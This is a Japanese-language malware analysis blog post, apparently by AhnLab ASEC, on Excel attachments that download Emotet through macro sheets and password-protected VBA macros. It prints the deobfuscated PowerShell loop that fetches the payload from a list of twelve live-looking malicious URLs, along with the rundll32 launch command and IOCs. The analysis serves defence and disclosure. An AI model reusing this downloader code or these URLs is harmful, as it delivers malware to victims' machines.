Excel ドキュメントによる Emotet マルウェアが韓国国内で拡散中

ASEC 分析チームは最近、Emotet マルウェアをダウンロードする不正な Excel ドキュメントが活発に出回っていることを確認した。先月「Excel ファイルを通じて拡散する Emotet マルウェア」で、このタイプのマルウェアについて紹介したことがある。当初はマクロシートを利用したタイプの Excel ドキュメントのみが確認されていたが、最近は VBA マクロを利用して不正な振る舞いを実行するタイプも追加された。

拡散しているメールにはパスワードが設定された圧縮ファイルが添付されており、圧縮ファイルの内部には Excel ドキュメントが存在する。

[図1] 拡散しているメール1
[図2] 拡散しているメール2
[図3] 圧縮ファイル内に含まれた Excel ドキュメント

Scan_2456321.xlsx ファイルの場合、以前と同様に Auto_Open に指定されているセルの数式によって不正なコマンドを実行する。

[図4] Scan_2456321.xlsx ファイル

非表示のシートには[図5]のような数式が存在し、ユーザーがコンテンツの有効化ボタンをクリックすると追加のファイルをダウンロードする数式が生成される。

[図5] Scan_2456321.xlsx に存在する数式

追加で生成される数式は以下の通りである。その後、この数式が実行されると、特定のアドレスから Emotet マルウェアをダウンロードして iix.ocx で保存および実行する。

[図6] 生成された追加の数式

もう一方の Excel ドキュメントである 4968839233806560.xls ファイルは、上記の Excel ドキュメントとは異なり内部に VBA マクロを含んでいる。ただし、Excel ドキュメント内部には以下のような画像を含んでおり、マクロの実行を誘導している。

[図7] 4968839233806560.xls に含まれた画像

この Excel ドキュメントは VBAProject にパスワードが設定されており、マクロコードが隠されている。

[図8] パスワードが設定された VBAProject

パスワードを入力して解除すると、以下のように VBA マクロを確認することができる。このマクロは、Workbook_Open() 関数によってユーザーがコンテンツの有効化ボタンをクリックすると不正なマクロコードが自動で実行されるようにしている。

[図9] VBA マクロコード

マクロを実行すると programdata フォルダーに wetidjks.vbs と jledshf.bat を生成したあと wetidjks.vbs ファイルを実行する。

wetidjks.vbs は難読化されており、実行すると jledshf.bat を実行してダウンロードされた Emotet マルウェアを実行できるように以下のコマンドを実行する。

  • cmd /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd

jledshf.bat には base64 でエンコードされた PowerShell コマンドが存在し、実行すると PowerShell によって以下に存在するアドレスから Emotet マルウェアをダウンロードし、programdata フォルダーに vbkwk.dll として保存する。

powershell –enc $gjsebngukiwug3kwjd="http://actividades.laforetlanguages.com/wp-admin/BlkdOKDXL/,http://sbcopylive.com.br/rjuz/w/,https://trasix.com/wp-admin/y5Aa1jt0Sp2Qk/,https://www.parkinsons.co.in/abc/Y6Y0fTbUEg6/,https://biz.merlin.ua/wp-admin/W6agtFSRZGt371dV/,http://bruckevn.site/3yztzzvh/nmY4wZfbYL/,https://pardiskood.com/wp-content/NR/,https://daujimaharajmandir.org/wp-includes/63De/,https://datasits.com/wp-includes/Zkj4QO/,https://anugerahmasinternasional.co.id/wp-admin/SJbxE5I/,https://atmedic.cl/sistemas/3ZbsUAU/,https://anwaralbasateen.com/Fox-C404/mDHkfgebMRzmGKBy/".spLiT(",");
fOreaCh($hklwRHJSe4h in $gjsebngukiwug3kwjd){
	$Js3hlskdcfk="vbkwk";
	$sdewHSw3gkjsd=Get-Random;
	$IDrfghsbzkjxd="c:\programdata\"+$Js3hlskdcfk+".dll";
	iNvOke-wEbreQuesT -uRi $hklwRHJSe4h -ouTfiLe $IDrfghsbzkjxd;
	if(test-pAtH $IDrfghsbzkjxd){
		if((get-iTem $IDrfghsbzkjxd).Length -ge 50000){break;}
	}
}

Excel ドキュメントによってダウンロードされた Emotet マルウェアは、実行すると内部に存在する多数の C&C サーバアドレスに接続を試み、接続に成功すると攻撃者によるコマンドを受け取って追加のマルウェアダウンロード等の不正な振る舞いを実行することができる。

最近は Emotet マルウェアがダウンロードされる Excel ドキュメントの拡散が活発に行われており、マルウェアのダウンロードに利用される方式も様々なため、ユーザーの注意が要求される。これまでも強調してきたように、送信者が不明なメールの添付ファイルや、出どころが不明なファイルは開かないようにしなければならない。また、マクロの実行を制限することで不正なマクロが自動で実行されないように注意しなければならない。

V3 では、ファイル検知に加えて以下のようにビヘイビア検知も可能である。

[ファイル検知]
Trojan/XLS.PsExec
Trojan/XLS.Agent
Trojan/Win.Emotet

[ビヘイビア検知]
Execution/MDP.Rundll.M4179
Execution/MDP.Powershell.M4201

[IOC 情報]
8b7a08559eec18b8ccabe70289e67b94
c4f65501d52cbfa5d454d06309545720
c52358a4a8d0b09e98382e5ba4a143a4
c2de652b094b538070e754ee09f3c737

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

5 2 votes
評価する
guest
1 コメント
Inline Feedbacks
View all comments